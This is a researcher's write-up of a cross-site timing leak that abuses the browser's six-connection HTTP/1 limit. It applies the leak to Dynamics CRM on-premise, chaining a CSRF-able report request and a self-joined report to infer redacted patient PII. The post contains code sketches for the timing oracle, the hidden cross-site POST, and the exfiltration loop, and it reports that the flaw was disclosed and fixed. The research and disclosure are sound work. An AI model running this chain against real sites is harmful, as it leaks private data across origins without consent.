XSLeaking with my best bud SOP

Introduction

During any bug hunting journey, there's bound to be something special. I dedicate this blog post to the most fun CTF-like challenge I encountered while working on the Microsoft Dynamics platform. It walks through my revision of an existing XS-Leak technique, then a case study of how it applied to Dynamics CRM on-premise.

Cross-domain leakage using connection limit

Going through the XSLeaks Wiki with a miniature lab (PHP calling sleep() to simulate database activity, plus some JS) was really fun. The Connection Pool section, however, sparked some unusual interest for me, as it links to a Chromium issue that was marked won't-fix and even contains a PoC (a rough reconstruction follows the list below). The exploit hinges on the fact that popular browsers keep a global pool of connection sockets:

  • A user opens a page on an attacker-controlled domain.
  • The attacker issues an AJAX request to the victim domain with some control over how the data is loaded.
  • Let's say the limit of the global pool is 256 connections. While the XHR to the victim domain is running, the attacker fetches resources from 256 other domains that he controls.
  • The attacker observes the timing of the 256th connection. Based on this, he can deduce whether the XHR to the victim took a long or a short time to complete.
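
As a rough reconstruction of what that PoC does (my own sketch, not the code from the Chromium issue; the attackerN.example hosts and the /slow and /fast endpoints are placeholders for attacker-controlled servers, where /slow deliberately holds its response open):

```ts
// Sketch of the global connection pool probe described above.
async function probeGlobalPool(victimUrl: string): Promise<number> {
  // Kick off the cross-origin request whose duration we want to infer.
  // no-cors lets it fire even though the response can never be read.
  fetch(victimUrl, { mode: "no-cors", credentials: "include" }).catch(() => {});

  // Fill the rest of the global socket pool with requests to 255 distinct
  // attacker-controlled domains whose responses are deliberately held open.
  for (let i = 1; i <= 255; i++) {
    fetch(`https://attacker${i}.example/slow`, { mode: "no-cors" }).catch(() => {});
  }

  // The 256th request cannot get a socket until one is released, which should
  // only happen when the victim request completes (the fillers never finish).
  // /fast answers immediately, so its completion time is dominated by the wait.
  const start = performance.now();
  await fetch("https://attacker256.example/fast", { mode: "no-cors" });
  return performance.now() - start;
}
```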

This proposition is extremely attractive, since other techniques have either been mitigated, require special markup or response headers, or can only be used with strict synchronization (i.e., the data is returned directly in the response instead of in a deferred fetch). I fixed up the PoC in the issue and ran it against the miniature lab, but did not obtain any meaningful results. Upon closer inspection of the Wiki page, Mozilla has confirmed that they have implemented mitigations in Firefox. Even if everything had gone as expected, though, I wouldn't have personally submitted a report using this technique, as the exploit only works if the victim does nothing (e.g., doesn't navigate to another page in a different tab) and watches it run for the whole duration. This situation is one of the very few times that SOP would work to the attacker's benefit.

Searching for information on connection pools in popular browsers yielded very interesting information, however. During the HTTP/1.x era, a technique called domain sharding was used to bypass the browser's limit on active connections to a single domain. It has become obsolete with HTTP/2, as the new protocol multiplexes requests over a single connection. In Chrome, this limit is 6 connections per domain, and it can be exploited to leak the timing of requests cross-domain.

Cross-domain leakage using HTTP/1 connection limit

In the following setup, the attacker's goal is to determine whether the XHR to victim.domain/resource has completed, given some knowledge of when the request starts, in this case at iframe.load, which can be captured cross-domain.

Suppose this request takes approximately 1.5 seconds. By tricking the victim into visiting a page he controls, the attacker can detect it by asynchronously requesting a static resource like victim.domain/static.png in blocks of 6. Cache-busting parameters should be included in these requests so that caching doesn't interfere with the measurements. An iframe, or any other element that loads resources asynchronously such as script, would work, so X-Frame-Options isn't an issue.
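
A minimal sketch of that probing primitive (illustrative, not the exploit code I actually used), assuming victim.domain/static.png is served over HTTP/1.1:

```ts
// Load one cache-busted copy of the static resource and report how long it took.
function loadProbe(url: string): Promise<number> {
  return new Promise((resolve) => {
    const start = performance.now();
    const img = new Image();
    // onload/onerror both mean the connection slot was acquired and released,
    // which is all the measurement needs.
    img.onload = img.onerror = () => resolve(performance.now() - start);
    img.src = url;
  });
}

// Fire a block of 6 probes in parallel and collect each one's duration.
async function probeBlock(): Promise<number[]> {
  const probes: Promise<number>[] = [];
  for (let i = 0; i < 6; i++) {
    probes.push(loadProbe(`https://victim.domain/static.png?cb=${Date.now()}-${i}`));
  }
  return Promise.all(probes);
}
```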

BlockSocket

As the size of the static resource does not vary, the running time of 6 parallel requests for it is expected to be about the same every time. This only holds when no other requests are running. When a request to victim.domain/resource is in flight, the waterfall of requests obtained from Chrome DevTools looks like the following, supposing that each static resource request takes approximately 1 second.

BlockWaterfall

We can observe that:

  • The first 5 requests for the static resource victim.domain/static.png go through just fine and take approximately 1 second to complete, as expected.
  • The 6th request is stalled for approximately 1 second. The browser has to wait for one of the first 5 requests to finish before executing the 6th, since the request to the target victim.domain/resource will keep its connection busy for another 0.5 seconds.
  • As the first 5 requests all finish after approximately 1 second, the 6th to 10th requests for victim.domain/static.png all take approximately 2 seconds to finish.
  • At the 1.5-second mark, the target request to victim.domain/resource finishes, unblocking the 11th request. The total time for the 11th request to complete is 2.5 seconds from the initial iframe.load event.

Based on these observations, we can conclude that, provided the target host speaks HTTP/1 and requests to a static resource remain reasonably constant during the attack, an attacker can determine at any single point in time whether cross-domain requests are running.
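
To put a rough model on it (my own notation, not something from the original write-up): let s be the duration of one static fetch and T the time the cross-domain request still has left when the probe block starts.

```latex
% Rough timing model for one 6-request probe block.
% s = duration of one static fetch, T = time left on the cross-domain request.
\[
  \mathrm{stall}_6 \approx \min(s, T), \qquad t_6 \approx \min(s, T) + s
\]
% With no cross-domain request in flight, T = 0 and t_6 is about s; if one is
% still running for at least s, t_6 is about 2s. In the example above
% (s = 1 s, T = 1.5 s) the sixth probe finishes around the 2-second mark.
```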

In a real environment, jitter can be a massive problem and create false results. The following is the waterfall of my exploit encountering this phenomenon.

FalseNegative

In this instance, Chrome DevTools indicated that the 6th request in the block experienced a stall, the sign that an XHR is running cross-domain. However, because the fetch happened to be dramatically faster on this specific request, its total time to completion was approximately the same as that of the 5 previous ones. Without the Timing-Allow-Origin header, there is no way to isolate the stall time of a cross-domain request, so the attacker draws the wrong conclusion that there isn't an XHR running on the victim domain.

To safeguard against this, the attacker has to:

  • Decrease sensitivity. The 6th request taking 133% longer than the average of the previous 5 proved to be good enough, both in the LAN scope and over the internet (a VPN connection from Vietnam to India and back), to conclude that an XHR is running in the background.
  • Perform multiple sanity checks. Multiple test instances should yield the same result; this consistency is required before a conclusion can be drawn (see the sketch below).
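
A sketch of that decision logic, reusing the probeBlock helper from the earlier sketch (the 1.33 factor is just my reading of the 133% figure, and the trial count is a tunable):

```ts
// Compare the 6th probe against the first 5 and require every trial to agree
// before concluding that a cross-domain XHR is running.
async function xhrIsRunning(trials = 3): Promise<boolean> {
  let positives = 0;
  for (let t = 0; t < trials; t++) {
    const durations = await probeBlock();                // 6 cache-busted probes
    const baseline = durations.slice(0, 5).reduce((a, b) => a + b, 0) / 5;
    if (durations[5] > baseline * 1.33) positives++;     // 6th probe visibly stalled
  }
  return positives === trials;                           // only trust a unanimous result
}
```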

Inception

The aforementioned revision was made around December 2020, when I was combing through the report generation functionality in Dynamics CRM on-premise and came across the following POST request, which did not include a CSRF token but returned 200 just fine.

CSRFLoadReport

This request simply opens a report with the corresponding id and throws 400 if the user does not have view permission. Notice that it also contains a CRM_filter, which means an attacker can force any user to load a report in a certain way, as long as he knows its id and the user can view it. Since the attacker can share his own report with others in the same tenant, the id parameter isn't an issue. CRM_filter supports a partial match construct (i.e., LIKE in SQL) on arbitrary columns in the dataset.

To discuss a little bit about why this worked despite SameSite at the time: by default, Dynamics CRM on-premise is deployed in an Active Directory environment and therefore uses NTLM/Kerberos authentication. As this method attaches a token to a header (Authorization: NTLM) instead of a cookie, SameSite does not do anything. Also to the attacker's advantage, NTLM authentication is incompatible with HTTP/2, at least on IIS.
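
A minimal sketch of that cross-site trigger under the assumptions above (REPORT_VIEWER_URL is a placeholder for the endpoint shown in the screenshot, and the real request carries more parameters than the two modeled here):

```ts
const REPORT_VIEWER_URL = "/placeholder/report/viewer"; // not the real path

// Hidden cross-site POST that loads the shared report with an attacker-chosen
// filter. SameSite does not interfere because the NTLM credential travels in
// the Authorization header rather than in a cookie.
function loadReportCrossSite(reportId: string, crmFilter: string): HTMLIFrameElement {
  const frame = document.createElement("iframe");
  frame.style.display = "none";
  document.body.appendChild(frame);

  const doc = frame.contentDocument!;                    // initial about:blank document
  const form = doc.createElement("form");
  form.method = "POST";
  form.action = "https://victim.domain" + REPORT_VIEWER_URL;
  for (const [name, value] of [["id", reportId], ["CRM_filter", crmFilter]]) {
    const input = doc.createElement("input");
    input.type = "hidden";
    input.name = name;
    input.value = value;
    form.appendChild(input);
  }
  doc.body.appendChild(form);
  form.submit();                                         // navigates the hidden iframe
  return frame;                                          // frame.onload fires when the viewer has loaded
}
```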

As this action is idempotent (loading the report multiple times does not change its content), I started thinking about strategies that would let me leak that content. Common sense suggests that it would be too easy if the server allowed you to create a report querying data in a table you don't have view permission on. It did not. I took note, browsed elsewhere, and did not come back until I discovered that Dynamics CRM supports field-level security.

To spare anyone who doesn't want to go through the documentation, an example of this fine-grained RBAC being applied would be a situation like this:

  • Alice is a nurse and Chris is a lab tech; they both work at the same clinic.
  • Alice handles patients and needs to know their PII to contact them when results are out.
  • Chris, however, has no need for PII and can process tests just fine. Results can be correlated using a GUID primary key.
  • The Admin can therefore restrict Chris's access to the fields on the Customer table that contain any PII. When Chris queries the table, he will know those fields exist, but the information is redacted.
  • As Chris has read access to the table, he can create a report.

I was very excited that there was a security boundary to break. Showing that Chris, as an attacker, can leak PII when Alice opens his report would make a convincing case. The hurdles were very high, though.

Even though Dynamics CRM uses SQL Server Reporting Services (SSRS) under the hood, I could not pass in a complete report definition (.rdl) without being an Admin. Normal users can only use the Report Wizard, which accepts a custom, sandboxed format. It also validates every permission the user carries, so no IDOR shenanigans here. The following request to SuccessFailurePage.aspx triggers those validations before generating a report definition using XSLT.

SuccessFailurePage

Here's the wizardPagePostData parameter in more detail:

CustomReport

The part outlined in green contains the metadata of the report. The part outlined in red contains a FetchXML query; this prevents injection, as report definitions can otherwise contain raw SQL. Furthermore, since SSRS reports can also contain JavaScript, Dynamics CRM only allows the user to modify a few CSS parameters, contained in the part outlined in blue, none of which are useful.

To make matters worse, what I also discovered going through the fine print was that the CSRF-able request loads the report viewer with the specified filter but does not fetch any information itself. The data is deferred and fetched later, at document.load, via an AJAX request to the server that is protected by a token. Chris, the attacker, needs an oracle to measure the timing of an XHR that he cannot initiate directly cross-domain. The aforementioned revision of the Connection Pool oracle is the result of me trying to find a way out of this situation.

Putting it all together

With an oracle in hand, we only need to inflate the timing difference between positive and negative queries. For example, in Dynamics CRM, to zero in on the phone number of a single patient that was redacted, we can perform an outer join of the patient dataset with itself before applying a filter based on the name of the person of interest.

RecursiveJoin

This creates a report with a lot of duplicate data. The point is to return all of the data when a query evaluates to true and nothing when it evaluates to false. The attacker controls the rendering at runtime using the CRM_filter parameter, which avoids having to create many reports.

ExploitReport

In this instance, it takes around 4 seconds to paginate and render the 313-page report versus an empty one in the LAN scope, where Active Directory is used the most. The exploit path is now clear (a rough sketch follows the list):

  • Chris creates a special report using the wizard, shares it with Alice, and sets up another domain with the exploit code.
  • Alice visits said domain and loads an empty report once using an impossible condition (i.e., searching for a random string against the name field). This forces all static resources to be cached client-side.
  • Next, sleep briefly after iframe.onload before using this impossible condition to determine a point in time where no XHR is running in the background.
  • Test whether this point in time is appropriate by using a strictly true condition (i.e., searching for the person of interest's name against the name field; since all rows have the same data, all data is returned).
  • If a delay is observed on the 6th request, the data XHR is running at this point. Chris now changes the filter to match against the phone_number field to exfiltrate data.
  • If no delay is observed, increase the initial delay and try again.
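
A loose sketch of that flow, reusing the hypothetical helpers from the earlier sketches (loadReportCrossSite and xhrIsRunning); the filter strings are illustrative placeholders, not real CRM_filter syntax:

```ts
const IMPOSSIBLE = "name LIKE 'zzz-no-such-patient'";    // always-empty report
const ALWAYS_TRUE = "name LIKE 'Person Of Interest'";    // every (duplicated) row matches

// One measurement: load the report cross-site with a filter, wait a bit after
// iframe.onload, then ask the 6-connection oracle whether an XHR is running.
// (The initial about:blank load of the iframe is ignored for brevity.)
async function runOnce(reportId: string, filter: string, delayMs: number): Promise<boolean> {
  const frame = loadReportCrossSite(reportId, filter);
  await new Promise<void>((resolve) => (frame.onload = () => resolve()));
  await new Promise((resolve) => setTimeout(resolve, delayMs));
  const busy = await xhrIsRunning();
  frame.remove();
  return busy;
}

// Find a delay at which the empty report is already idle while the full report
// is still busy rendering; that delay becomes the measurement point.
async function calibrate(reportId: string): Promise<number> {
  for (let delay = 500; delay <= 10_000; delay += 250) {
    const idleWhenEmpty = !(await runOnce(reportId, IMPOSSIBLE, delay));
    const busyWhenFull = await runOnce(reportId, ALWAYS_TRUE, delay);
    if (idleWhenEmpty && busyWhenFull) return delay;
  }
  throw new Error("could not find a usable measurement point");
}
```

From there, guesses against the phone_number field are just further runOnce calls at the calibrated delay: a stalled 6th probe means the filter matched and the large report is being rendered.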

Vendor's response

Microsoft accepted the issue as Information Disclosure of Important severity and paid out a bounty. No CVE was assigned, however. Considering a good ol' reflected XSS could have done way more with way less effort, I found this judgment to be extremely generous on their part. It took a year, but I got paid, so kudos to them.

Timeline:

13/01/2021 – Reported the vulnerability to the vendor
13/10/2021 – The vendor accepted the report
14/01/2022 – The vendor announced the issue has been fixed